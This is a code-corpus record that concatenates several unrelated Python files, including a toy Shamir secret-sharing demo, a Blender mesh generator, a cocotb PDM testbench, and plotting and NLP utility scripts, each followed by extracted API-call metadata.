(['ibane_tide.model'], {'index': 'constituent'}), '(ibane_tide.model, index=constituent)\n', (3746, 3783), False, 'from pandas import read_csv, DataFrame\n'), ((4321, 4377), 'pandas.DataFrame', 'DataFrame', (['UHSLM_tide2011.model'], {'index': 'UHSLM_constituent'}), '(UHSLM_tide2011.model, index=UHSLM_constituent)\n', (4330, 4377), False, 'from pandas import read_csv, DataFrame\n'), ((4682, 4732), 'pandas.DataFrame', 'DataFrame', (['OTPX_tide.model'], {'index': 'OTPX_constituent'}), '(OTPX_tide.model, index=OTPX_constituent)\n', (4691, 4732), False, 'from pandas import read_csv, DataFrame\n'), ((2004, 2039), 'datetime.datetime.strptime', 'datetime.strptime', (['a', '"""%Y/%m/%d %H"""'], {}), "(a, '%Y/%m/%d %H')\n", (2021, 2039), False, 'from datetime import datetime, timedelta\n'), ((2044, 2065), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1.15)'}), '(hours=1.15)\n', (2053, 2065), False, 'from datetime import datetime, timedelta\n')]
|
#!/usr/bin/env python3
'''
Code by <NAME>, <<EMAIL>>
based on "How to Share a Secret" by <NAME>
Published by :Communications of the ACM
November 1979, Volume 22, Num. 11
'''
import numpy as np
import random
def split_secret(secret, k, n):
'''
Secret in an integer
k is the minimum number of keys to get the secret back
n is the total number of keys generated
'''
#Create two empty lists and a dictionary
D = {}
A = []
B = []
#Set A0 to be the secret, as defined a0 = D
A.append(int(secret))
#Fill the rest of the list A, from A1 to An, with
#random numbers, as defined in paper "we pick a random
# k-1 polynomial"
for j in range(1,n):
A.append(random.randrange(1,100))
#Evaluate each polynomial, q(i)
for i in range(1,n+1):
#First item is A0
B.append(A[0])
#Every other item is evaluated by substituting x
for j in range(1,k):
B.append(A[j]*i**j)
#Sum all the polynomial terms, save sum as Di
#these are your keys
D[i] = sum(B)
B = [] #reset B in order to use again empty
return D
def get_secret(k,keys):
'''
k is the number of keys you are supplying
'''
#Create 3 empty lists
A = []
D = []
C = []
#Re-create the polynomials to solve
# for the coefficients
for i in range(1,k+2):
C.append(1)
for j in range(1,k+1):
C.append(i**j)
A.append(C)
D.append(keys[i-1])
C = []
#Solve Ax = D
# x are our coeeficients(a0 to an)
a = np.array(A)
d = np.array(D)
x = np.linalg.solve(a,d)
#The original Secret is a0
return int(x[0])
if __name__ == '__main__':
'''
Call split_secret() to generate keys
Call get_secret() to recover your original secret
Disclaimer: get_secret() just takes the first k keys and assumes
they are in order, this can be easily implemented for any keys
in any order, but this code is simply to highlight the simplicity
of the (k, n) threshold scheme
'''
keys = split_secret('12345678910',3,5)
recovered_secret = get_secret(3,keys)
print(recovered_secret)
'''
Thanks to <NAME> and <NAME> for review of the code
Thanks to <NAME> for the inspiration, and ByteAcademy in NY
for teaching me Python
'''
|
[
"numpy.linalg.solve",
"numpy.array",
"random.randrange"
] |
[((1611, 1622), 'numpy.array', 'np.array', (['A'], {}), '(A)\n', (1619, 1622), True, 'import numpy as np\n'), ((1631, 1642), 'numpy.array', 'np.array', (['D'], {}), '(D)\n', (1639, 1642), True, 'import numpy as np\n'), ((1651, 1672), 'numpy.linalg.solve', 'np.linalg.solve', (['a', 'd'], {}), '(a, d)\n', (1666, 1672), True, 'import numpy as np\n'), ((724, 748), 'random.randrange', 'random.randrange', (['(1)', '(100)'], {}), '(1, 100)\n', (740, 748), False, 'import random\n')]
|
import numpy as np
id = None
with open('set_splits/bboxes_train_val_test_split_3buckets.csv', 'r') as bboxes:
count_boxes = []
boxes = 0
for line in bboxes:
filename, x1, y1, x2, y2, class_name, bucket, set = line.strip().split(',')
new_id = filename.split('_')[0]
if not id:
id = new_id
if id == new_id:
boxes += 1
else:
count_boxes.append(boxes)
id = new_id
boxes = 1
print(len(count_boxes))
np_arr = np.array(count_boxes)
mean = np.mean(np_arr)
print(mean)
|
[
"numpy.mean",
"numpy.array"
] |
[((542, 563), 'numpy.array', 'np.array', (['count_boxes'], {}), '(count_boxes)\n', (550, 563), True, 'import numpy as np\n'), ((574, 589), 'numpy.mean', 'np.mean', (['np_arr'], {}), '(np_arr)\n', (581, 589), True, 'import numpy as np\n')]
|
import numpy as np
from numpy.linalg import norm
from funcs.general_functions import *
from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide
from funcs.general_functions import getFlatAngle
LABEL = "Truncated Icosahedron"
OPERATOR = "mesh.create_truncated_icosahedron"
# create operator
class MESH_OT_CreateTruncatedIcosahedron(bpy.types.Operator):
bl_idname = OPERATOR
bl_label = LABEL
def execute(self, context):
(obj, mesh) = createNewEmptyObject(LABEL)
# create Bmesh
bm = getNewBaseIcosahedron(2)
bm = truncateSolid(bm)
bm.to_mesh(mesh)
obj.select_set(True)
# set properties
props = mesh.SphereTopology
props.sphere_radius = 2
props.sphere_type = LABEL
props.sphere_resolution = 1
setSphereUpdated(props)
props.sphere_do_update = True
return {'FINISHED'}
def register():
bpy.utils.register_class(MESH_OT_CreateTruncatedIcosahedron)
def unregister():
bpy.utils.unregister_class(MESH_OT_CreateTruncatedIcosahedron)
############################################
# ATTENTION! updateSphereResolution() doesn't normalize vertices to keep the same dimensions of the generating Icosahedron.
# this means that morphSphere() will have a "jump" the first time it is used
# must keep this prototype
def updateSphereResolution(mesh):
"""
rebuilds the sphere with new parameters in mesh.SphereTopology. Required if vertex structure changes, else use morphSphere
:param mesh:
"""
bm = bmesh.new()
bm.from_mesh(mesh)
mytool = mesh.SphereTopology
res = mytool.sphere_resolution
radius = mytool.sphere_radius
bm.verts.ensure_lookup_table()
# get bmesh of default IcoSphere
bm = getNewBaseIcosahedron(radius)
iterations = res - 1
# noinspection PyTypeChecker
subdivide(bm, iterations, radius)
bm = truncateSolid(bm)
bm.to_mesh(mesh)
bm.free()
setSphereUpdated(mytool)
# must keep this prototype
def morphSphere(mesh):
"""
move pre-existing vertices around after a change in the radius, without changing the number of vertices/faces
:param mesh:
"""
bm = bmesh.new()
bm.from_mesh(mesh)
mytool = mesh.SphereTopology
radius = mytool.sphere_radius
# update all vertices
for v in bm.verts:
normalizeVert(v, radius)
bm.to_mesh(mesh)
bm.free()
setSphereUpdated(mytool)
def truncateSolid(bm_old) -> bmesh:
bm = bmesh.new()
bm_old.normal_update()
pentagon_vertices = {v: [] for v in bm_old.verts}
hexagon_vertices = {f: [] for f in bm_old.faces}
for edge in bm_old.edges:
a = np.array(edge.verts[0].co)
b = np.array(edge.verts[1].co)
v1 = bm.verts.new((2 * a + b) / 3)
v2 = bm.verts.new((a + 2 * b) / 3)
pentagon_vertices[edge.verts[0]].append(v1)
pentagon_vertices[edge.verts[1]].append(v2)
hexagon_vertices[edge.link_faces[0]] += [v1, v2]
hexagon_vertices[edge.link_faces[1]] += [v1, v2]
bm.verts.ensure_lookup_table()
# for each pentagon and hexagon, sort vertices in anticlockwise order around the old vertex/face normal and create new face
for old_elem, vertices in {**pentagon_vertices, **hexagon_vertices}.items():
orderedVerts = sortAntiClockwise3D(old_elem.normal, vertices)
bm.faces.new(orderedVerts)
bm_old.free()
return bm
def sortAntiClockwise3D(normal, verts):
# if normal is vertical, use simple flat trigonometry
if abs(normal[0]) < 0.0001 and abs(normal[1]) < 0.0001:
return sorted(verts, key=lambda v: getFlatAngle(v.co))
# convert to local coordinates on the 2D plane of the future face to sort using flat angles
n = np.array(normal)
z = n / norm(n)
u = np.array([0, 0, 1])
k = u - np.dot(u, z) * z
x = k / norm(k)
y = np.cross(z, x)
return sorted(verts, key=lambda vert: getFlatAngle(convertToFlatCoordinates(vert.co, x, y)))
def convertToFlatCoordinates(coords, x, y):
co = np.array(coords)
return [np.dot(co, x), np.dot(co, y)]
|
[
"Topologies.Icosahedron.subdivide",
"numpy.cross",
"numpy.linalg.norm",
"numpy.array",
"numpy.dot",
"Topologies.Icosahedron.getNewBaseIcosahedron",
"funcs.general_functions.getFlatAngle"
] |
[((1778, 1807), 'Topologies.Icosahedron.getNewBaseIcosahedron', 'getNewBaseIcosahedron', (['radius'], {}), '(radius)\n', (1799, 1807), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((1871, 1904), 'Topologies.Icosahedron.subdivide', 'subdivide', (['bm', 'iterations', 'radius'], {}), '(bm, iterations, radius)\n', (1880, 1904), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((3773, 3789), 'numpy.array', 'np.array', (['normal'], {}), '(normal)\n', (3781, 3789), True, 'import numpy as np\n'), ((3818, 3837), 'numpy.array', 'np.array', (['[0, 0, 1]'], {}), '([0, 0, 1])\n', (3826, 3837), True, 'import numpy as np\n'), ((3895, 3909), 'numpy.cross', 'np.cross', (['z', 'x'], {}), '(z, x)\n', (3903, 3909), True, 'import numpy as np\n'), ((4062, 4078), 'numpy.array', 'np.array', (['coords'], {}), '(coords)\n', (4070, 4078), True, 'import numpy as np\n'), ((534, 558), 'Topologies.Icosahedron.getNewBaseIcosahedron', 'getNewBaseIcosahedron', (['(2)'], {}), '(2)\n', (555, 558), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((2693, 2719), 'numpy.array', 'np.array', (['edge.verts[0].co'], {}), '(edge.verts[0].co)\n', (2701, 2719), True, 'import numpy as np\n'), ((2732, 2758), 'numpy.array', 'np.array', (['edge.verts[1].co'], {}), '(edge.verts[1].co)\n', (2740, 2758), True, 'import numpy as np\n'), ((3802, 3809), 'numpy.linalg.norm', 'norm', (['n'], {}), '(n)\n', (3806, 3809), False, 'from numpy.linalg import norm\n'), ((3879, 3886), 'numpy.linalg.norm', 'norm', (['k'], {}), '(k)\n', (3883, 3886), False, 'from numpy.linalg import norm\n'), ((4091, 4104), 'numpy.dot', 'np.dot', (['co', 'x'], {}), '(co, x)\n', (4097, 4104), True, 'import numpy as np\n'), ((4106, 4119), 'numpy.dot', 'np.dot', (['co', 'y'], {}), '(co, y)\n', (4112, 4119), True, 'import numpy as np\n'), ((3850, 3862), 'numpy.dot', 'np.dot', (['u', 'z'], {}), '(u, z)\n', (3856, 3862), True, 'import numpy as np\n'), ((3649, 3667), 'funcs.general_functions.getFlatAngle', 'getFlatAngle', (['v.co'], {}), '(v.co)\n', (3661, 3667), False, 'from funcs.general_functions import getFlatAngle\n')]
|
# This file is public domain, it can be freely copied without restrictions.
# SPDX-License-Identifier: CC0-1.0
import numpy as np
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import FallingEdge, Timer
import sys
sys.path.append('../../../py/')
import pdm
WINDOW_LEN = 250
def get_msg(i, received, expected):
return 'idx {}, dut output of {}, expected {}'.format(i, received, expected)
def get_test_vector():
n = 100
# x = np.random.randint(2**15, size=n)
t = np.linspace(0, 1, n)
x = np.cos(2*np.pi * 5 * t) * (2**15 - 1)
x = pdm.pcm_to_pdm_pwm(x)
# x = pdm.pcm_to_pdm_random(x)
# x = pdm.pcm_to_pdm_err(x)
print('generated pdm sig', x[10:])
print('len x', len(x))
y = pdm.pdm_to_pcm(x, 2)
print('expected values', y)
print('len y', len(y))
return x, y
async def check_output(dut):
print('Beginning test with random input data.')
x, y = get_test_vector()
i = 0 # index into x
j = 0 # index into y
while i < len(x):
dut.data_i <= int(x[i])
# valid = np.random.randint(2) # randomly de-assert valid
valid = 1
dut.valid_i <= (1 if valid else 0)
await Timer(1, units='us') # let combinational logic work
if (dut.valid_o.value.integer):
expected_val = y[j]
received_val = dut.data_o.value.signed_integer
if (j >= 2): # first TWO values are garbage
assert received_val == expected_val, get_msg(i, received_val,
expected_val)
j += 1
print('\r{}/{}'.format(j, len(y)), end='')
if (valid):
i += 1
await FallingEdge(dut.clk_i)
async def check_output_no_en(dut):
'''Check that dut doesn't output valid data if en if off.'''
print('Beginning test with random input data but en_i is low.')
await Timer(1, units='us')
for i in range(1000):
dut.data_i <= int(np.random.randint(2)) # feed in garbage data
dut.valid_i <= 1
assert dut.valid_o == 0
await FallingEdge(dut.clk_i)
@cocotb.test()
async def main(dut):
""" Test Rectified Linear Unit """
# Create a 10us period clock on port clk
clock = Clock(dut.clk_i, 10, units="us")
cocotb.fork(clock.start())
# Reset system
await FallingEdge(dut.clk_i)
dut.rst_n_i <= 0
dut.en_i <= 0
dut.data_i <= 0
dut.valid_i <= 0
# reset
await FallingEdge(dut.clk_i)
dut.rst_n_i <= 1
# test 1
dut.en_i <= 1
await check_output(dut)
# test 2
dut.en_i <= 0
await check_output_no_en(dut)
# test 3
dut.en_i <= 1
await check_output(dut)
|
[
"sys.path.append",
"cocotb.clock.Clock",
"pdm.pcm_to_pdm_pwm",
"cocotb.triggers.Timer",
"cocotb.test",
"cocotb.triggers.FallingEdge",
"numpy.random.randint",
"numpy.linspace",
"pdm.pdm_to_pcm",
"numpy.cos"
] |
[((236, 267), 'sys.path.append', 'sys.path.append', (['"""../../../py/"""'], {}), "('../../../py/')\n", (251, 267), False, 'import sys\n'), ((2134, 2147), 'cocotb.test', 'cocotb.test', ([], {}), '()\n', (2145, 2147), False, 'import cocotb\n'), ((502, 522), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', 'n'], {}), '(0, 1, n)\n', (513, 522), True, 'import numpy as np\n'), ((578, 599), 'pdm.pcm_to_pdm_pwm', 'pdm.pcm_to_pdm_pwm', (['x'], {}), '(x)\n', (596, 599), False, 'import pdm\n'), ((741, 761), 'pdm.pdm_to_pcm', 'pdm.pdm_to_pcm', (['x', '(2)'], {}), '(x, 2)\n', (755, 761), False, 'import pdm\n'), ((2265, 2297), 'cocotb.clock.Clock', 'Clock', (['dut.clk_i', '(10)'], {'units': '"""us"""'}), "(dut.clk_i, 10, units='us')\n", (2270, 2297), False, 'from cocotb.clock import Clock\n'), ((531, 556), 'numpy.cos', 'np.cos', (['(2 * np.pi * 5 * t)'], {}), '(2 * np.pi * 5 * t)\n', (537, 556), True, 'import numpy as np\n'), ((1919, 1939), 'cocotb.triggers.Timer', 'Timer', (['(1)'], {'units': '"""us"""'}), "(1, units='us')\n", (1924, 1939), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2359, 2381), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2370, 2381), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2485, 2507), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2496, 2507), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1196, 1216), 'cocotb.triggers.Timer', 'Timer', (['(1)'], {'units': '"""us"""'}), "(1, units='us')\n", (1201, 1216), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1717, 1739), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (1728, 1739), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2109, 2131), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2120, 2131), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1992, 2012), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (2009, 2012), True, 'import numpy as np\n')]
|
import numpy as np
from numpy.polynomial import polynomial as poly
import scipy.signal as signal
import matplotlib.pyplot as plt
# Component values
GAIN = 1.0
R6 = 10e3
Ra = 100e3 * GAIN
R10b = 2e3 + 100e3 * (1-GAIN)
R11 = 15e3
R12 = 422e3
C3 = 0.1e-6
C5 = 68e-9
C7 = 82e-9
C8 = 390e-12
a0s = C7 * C8 * R10b * R11 * R12
a1s = C7 * R10b * R11 + C8 * R12 * (R10b + R11)
a2s = R10b + R11
b0s = a0s
b1s = C7 * R11 * R12 + a1s
b2s = R12 + a2s
w, h = signal.freqs([b0s, b1s, b2s], [a0s, a1s, a2s], worN=np.logspace(1.3, 4.3, 1000)*(2*np.pi))
plt.semilogx(w/(2*np.pi), 20*np.log10(np.abs(h+np.finfo(float).eps)))
plt.show()
# Create impedances
# z1Num = R6 # poly.Polynomial((1, R6 * (C3 + C5)))
# z1Den = poly.Polynomial((0, C3, R6 * C3 * C5))
# z2Num = R10b + R11 # poly.Polynomial((R10b + R11, C7 * R10b * R11))
# z2Den = 1.0 # poly.Polynomial((1, C7 * R11))
# z3Num = R12
# z3Den = 1 # poly.Polynomial((1, C8 * R12))
# # Simplify
# b_s = z1Den * Ra * (z3Den * z2Num + z2Den * z3Num)
# a_s = z2Den * z3Den * (Ra * z1Den + z1Num)
# print(b_s.coef)
# print(a_s.coef)
# w, h = signal.freqs(b_s.coef, a_s.coef, worN=np.logspace(0, 2, 1000)*(2*np.pi))
# plt.semilogx(w/(2*np.pi), 20*np.log10(np.abs(h+np.finfo(float).eps)))
# plt.show()
|
[
"numpy.logspace",
"matplotlib.pyplot.show",
"numpy.finfo"
] |
[((613, 623), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (621, 623), True, 'import matplotlib.pyplot as plt\n'), ((503, 530), 'numpy.logspace', 'np.logspace', (['(1.3)', '(4.3)', '(1000)'], {}), '(1.3, 4.3, 1000)\n', (514, 530), True, 'import numpy as np\n'), ((590, 605), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (598, 605), True, 'import numpy as np\n')]
|
import numpy as np
from sklearn.manifold import TSNE
from keyphrase.dataset import keyphrase_test_dataset
from keyphrase.dataset.keyphrase_test_dataset import testing_data_loader
from emolga.dataset.build_dataset import deserialize_from_file, serialize_to_file
from keyphrase.config import *
# We'll use matplotlib for graphics.
import matplotlib.pyplot as plt
import matplotlib.patheffects as PathEffects
import matplotlib
# We import seaborn to make nice plots.
import seaborn as sns
sns.set_style('darkgrid')
sns.set_palette('muted')
sns.set_context("notebook", font_scale=1.5,
rc={"lines.linewidth": 2.5})
def chapter_scatter(x):
colors = np.asarray([book_name_id[doc['book_id']] for doc in docs])
# We choose a color palette with seaborn.
palette = np.array(sns.color_palette("hls", 10))
# # We create a scatter plot.
f = plt.figure(figsize=(20, 20))
# ax = plt.subplot(aspect='equal')
# sc = ax.scatter(x[:,0], x[:,1], lw=0, s=40,
# c=palette[colors.astype(np.int)])
# plt.xlim(-25, 25)
# plt.ylim(-25, 25)
# ax.axis('off')
# ax.axis('tight')
#
# # We add the labels for each digit.
# txts = []
# for i in range(len(colors)):
# # Position of each label.
# xtext, ytext = np.median(x[colors == i, :], axis=0)
# txt = ax.text(xtext, ytext, str(i), fontsize=24)
# txt.set_path_effects([
# PathEffects.Stroke(linewidth=5, foreground="w"),
# PathEffects.Normal()])
# txts.append(txt)
for label, x, y in zip([doc['name'] + '-' + doc['title'] for doc in docs], x[:, 0], x[:, 1]):
label = str(label)
if not label.startswith('mir') and not label.startswith('iir'):
continue
print(label)
book_name = label[:label.index('_')]
begin_index = label.find('_') + 1
end_index = label.find('_', label.index('_') + 1)
if end_index == -1:
end_index = label.find('-')
chapter_number = int(label[begin_index: end_index])
print(book_name + '-' + str(chapter_number))
if book_name=='mir':
if chapter_number < 2 or chapter_number > 8:
continue
color = 'r'
if book_name=='iir':
if chapter_number < 1 or chapter_number > 12:
continue
color = 'g'
plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')
plt.scatter(x, y, lw=0, s=40, c=color)
plt.savefig(config['predict_path']+'/ir_sections_tsne-generated.png', dpi=120)
plt.show()
def plot_chapter_vectors():
for doc, encoding in zip(docs, input_encodings):
print('*' * 50)
print(doc['name'] + ' - ' + doc['title'])
doc['forward_encoding'] = encoding[0][-1][:300]
doc['backward_encoding'] = encoding[0][0][300:]
doc['book_id'] = doc['name'][:doc['name'].index('_')]
# print(doc['book_id'] + ':' + doc['name'] + ' - ' + doc['title'])
# print(doc['encoding'])
if doc['book_id'] not in book_name_id:
book_name_id[doc['book_id']] = len(book_name_id)
# serialize_to_file(docs, config['path'] + '/dataset/textbook_linking/docs.pkl')
X = np.asarray([doc['forward_encoding'] for doc in docs])
model = TSNE(n_components=2, random_state=0)
np.set_printoptions(suppress=True)
digits_proj = model.fit_transform(X)
chapter_scatter(digits_proj)
def cut_zero(sample_index, idx2word):
sample_index = list(sample_index)
# if 0 not in sample:
# return ['{}'.format(idx2word[w].encode('utf-8')) for w in sample]
# # return the string before 0 (<eol>)
# return ['{}'.format(idx2word[w].encode('utf-8')) for w in sample[:sample.index(0)]]
if 0 in sample_index:
sample_index = sample_index[:sample_index.index(0)]
wordlist = []
find_copy = False
for w_index in sample_index:
if w_index >= config['voc_size']:
find_copy = True
else:
wordlist.append(idx2word[w_index].encode('utf-8'))
if find_copy:
# print('Find copy! - %s - %s' % (' '.join(wordlist), str(sample_index)))
wordlist = None
return wordlist
def phrase_scatter(x, labels):
# # We create a scatter plot.
f = plt.figure(figsize=(20, 20))
for label, x, y in zip(labels, x[:, 0], x[:, 1]):
plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')
plt.scatter(x, y, lw=0, s=40, c='black')
plt.savefig(config['predict_path']+'/ir_phrase_tsne-generated.png', dpi=120)
plt.show()
def plot_phrase_vectors():
phrase_dict = {}
for doc, prediction_list, score_list, encoding_list in zip(docs, predictions, scores, output_encodings):
# print('*' * 50)
# print(doc['name'] + ' - ' + doc['title'])
doc['book_id'] = doc['name'][:doc['name'].index('_')]
number_to_keep = 10
for prediction, score, encoding in zip(prediction_list, score_list, encoding_list):
predicted_word = cut_zero(prediction, idx2word)
if predicted_word == None:
continue
# if len(predicted_word)==1:
# continue
if ' '.join(predicted_word) not in phrase_dict:
phrase_dict[' '.join(predicted_word)] = {'score':score, 'encoding':encoding, 'word':' '.join(predicted_word), 'times':1}
else:
if score < phrase_dict[' '.join(predicted_word)]['score']:
phrase_dict[' '.join(predicted_word)]['score'] = score
phrase_dict[' '.join(predicted_word)]['encoding'] = encoding
phrase_dict[' '.join(predicted_word)]['times']+=1
number_to_keep -= 1
if number_to_keep == 0:
break
for p in phrase_dict.values():
p['score']/=p['times']
K = 200
p_list = sorted(phrase_dict.values(), key=lambda x:x['score']) #[:K]
print('#(phrase)=%d' % len(phrase_dict))
X = np.asarray([phrase['encoding'] for phrase in p_list])
label = np.asarray([phrase['word'] for phrase in p_list])
model = TSNE(n_components=2, random_state=0)
np.set_printoptions(suppress=True)
digits_proj = model.fit_transform(X)
phrase_scatter(digits_proj, label)
if __name__=='__main__':
config = setup_keyphrase_all() # load settings.
loader = testing_data_loader('irbooks', kwargs=dict(basedir=config['path']))
docs = loader.get_docs(return_dict=True)
train_set, validation_set, test_sets, idx2word, word2idx = deserialize_from_file(config['dataset'])
test_sets = keyphrase_test_dataset.load_additional_testing_data(config['testing_datasets'], idx2word, word2idx, config,
postagging=False)
test_set, test_s_list, test_t_list, test_s_o_list, test_t_o_list, input_encodings, predictions, scores, output_encodings, idx2word \
= deserialize_from_file(config['predict_path'] + 'predict.{0}.{1}.pkl'.format(config['predict_type'], 'irbooks'))
book_name_id = {}
# plot_phrase_vectors()
plot_chapter_vectors()
|
[
"seaborn.set_style",
"numpy.set_printoptions",
"matplotlib.pyplot.show",
"sklearn.manifold.TSNE",
"keyphrase.dataset.keyphrase_test_dataset.load_additional_testing_data",
"matplotlib.pyplot.annotate",
"matplotlib.pyplot.scatter",
"numpy.asarray",
"emolga.dataset.build_dataset.deserialize_from_file",
"matplotlib.pyplot.figure",
"seaborn.color_palette",
"seaborn.set_palette",
"seaborn.set_context",
"matplotlib.pyplot.savefig"
] |
[((489, 514), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (502, 514), True, 'import seaborn as sns\n'), ((515, 539), 'seaborn.set_palette', 'sns.set_palette', (['"""muted"""'], {}), "('muted')\n", (530, 539), True, 'import seaborn as sns\n'), ((540, 612), 'seaborn.set_context', 'sns.set_context', (['"""notebook"""'], {'font_scale': '(1.5)', 'rc': "{'lines.linewidth': 2.5}"}), "('notebook', font_scale=1.5, rc={'lines.linewidth': 2.5})\n", (555, 612), True, 'import seaborn as sns\n'), ((668, 726), 'numpy.asarray', 'np.asarray', (["[book_name_id[doc['book_id']] for doc in docs]"], {}), "([book_name_id[doc['book_id']] for doc in docs])\n", (678, 726), True, 'import numpy as np\n'), ((869, 897), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 20)'}), '(figsize=(20, 20))\n', (879, 897), True, 'import matplotlib.pyplot as plt\n'), ((2526, 2611), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(config['predict_path'] + '/ir_sections_tsne-generated.png')"], {'dpi': '(120)'}), "(config['predict_path'] + '/ir_sections_tsne-generated.png', dpi=120\n )\n", (2537, 2611), True, 'import matplotlib.pyplot as plt\n'), ((2609, 2619), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2617, 2619), True, 'import matplotlib.pyplot as plt\n'), ((3270, 3323), 'numpy.asarray', 'np.asarray', (["[doc['forward_encoding'] for doc in docs]"], {}), "([doc['forward_encoding'] for doc in docs])\n", (3280, 3323), True, 'import numpy as np\n'), ((3336, 3372), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'random_state': '(0)'}), '(n_components=2, random_state=0)\n', (3340, 3372), False, 'from sklearn.manifold import TSNE\n'), ((3377, 3411), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (3396, 3411), True, 'import numpy as np\n'), ((4327, 4355), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 20)'}), '(figsize=(20, 20))\n', (4337, 4355), True, 'import matplotlib.pyplot as plt\n'), ((4547, 4625), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(config['predict_path'] + '/ir_phrase_tsne-generated.png')"], {'dpi': '(120)'}), "(config['predict_path'] + '/ir_phrase_tsne-generated.png', dpi=120)\n", (4558, 4625), True, 'import matplotlib.pyplot as plt\n'), ((4628, 4638), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4636, 4638), True, 'import matplotlib.pyplot as plt\n'), ((6067, 6120), 'numpy.asarray', 'np.asarray', (["[phrase['encoding'] for phrase in p_list]"], {}), "([phrase['encoding'] for phrase in p_list])\n", (6077, 6120), True, 'import numpy as np\n'), ((6133, 6182), 'numpy.asarray', 'np.asarray', (["[phrase['word'] for phrase in p_list]"], {}), "([phrase['word'] for phrase in p_list])\n", (6143, 6182), True, 'import numpy as np\n'), ((6195, 6231), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'random_state': '(0)'}), '(n_components=2, random_state=0)\n', (6199, 6231), False, 'from sklearn.manifold import TSNE\n'), ((6236, 6270), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (6255, 6270), True, 'import numpy as np\n'), ((6624, 6664), 'emolga.dataset.build_dataset.deserialize_from_file', 'deserialize_from_file', (["config['dataset']"], {}), "(config['dataset'])\n", (6645, 6664), False, 'from emolga.dataset.build_dataset import deserialize_from_file, serialize_to_file\n'), ((6681, 6811), 'keyphrase.dataset.keyphrase_test_dataset.load_additional_testing_data', 'keyphrase_test_dataset.load_additional_testing_data', (["config['testing_datasets']", 'idx2word', 'word2idx', 'config'], {'postagging': '(False)'}), "(config[\n 'testing_datasets'], idx2word, word2idx, config, postagging=False)\n", (6732, 6811), False, 'from keyphrase.dataset import keyphrase_test_dataset\n'), ((796, 824), 'seaborn.color_palette', 'sns.color_palette', (['"""hls"""', '(10)'], {}), "('hls', 10)\n", (813, 824), True, 'import seaborn as sns\n'), ((2400, 2473), 'matplotlib.pyplot.annotate', 'plt.annotate', (['label'], {'xy': '(x, y)', 'xytext': '(0, 0)', 'textcoords': '"""offset points"""'}), "(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')\n", (2412, 2473), True, 'import matplotlib.pyplot as plt\n'), ((2482, 2520), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'lw': '(0)', 's': '(40)', 'c': 'color'}), '(x, y, lw=0, s=40, c=color)\n', (2493, 2520), True, 'import matplotlib.pyplot as plt\n'), ((4419, 4492), 'matplotlib.pyplot.annotate', 'plt.annotate', (['label'], {'xy': '(x, y)', 'xytext': '(0, 0)', 'textcoords': '"""offset points"""'}), "(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')\n", (4431, 4492), True, 'import matplotlib.pyplot as plt\n'), ((4501, 4541), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'lw': '(0)', 's': '(40)', 'c': '"""black"""'}), "(x, y, lw=0, s=40, c='black')\n", (4512, 4541), True, 'import matplotlib.pyplot as plt\n')]
|
import os
import typing
import pickle
import fasttext
import numpy as np
import tensorflow as tf
from utils import text_preprocessing
from utils import logging
logger = logging.getLogger()
PADDING_TOKEN = '<pad>'
UNKNOWN_TOKEN = '<unk>'
SAVED_MODEL_DIR = 'saved_model'
SHARED_PATH = '/project/cq-training-1/project2/teams/team12/'
MAX_SEQ_LEN = 134 # Maximum sequence length of the aligned data
aligned_data = None
back_translated_data = None
def create_folder(path: str):
""" This function creates a folder if it does not already exists."""
if not os.path.exists(path):
os.mkdir(path)
def save_model(model: tf.keras.Model, name: str = None):
""" This function saves the model to disk."""
create_folder(SAVED_MODEL_DIR)
if name:
model_path = os.path.join(SAVED_MODEL_DIR, name)
else:
model_path = os.path.join(SAVED_MODEL_DIR, model.get_name())
create_folder(model_path)
model.save_weights(os.path.join(model_path, "model"))
def save_metrics(metrics, name):
"""Save metrics to disk"""
path = os.path.join(SAVED_MODEL_DIR, name)
pickle.dump(metrics, open(os.path.join(path, 'metrics.pkl'), 'wb'))
def create_fasttext_embedding_matrix(file_path: str, vocab: typing.Dict[str, int],
embedding_dim: int) -> typing.Dict[str, np.ndarray]:
"""Train a fasttext model and return the embeddings."""
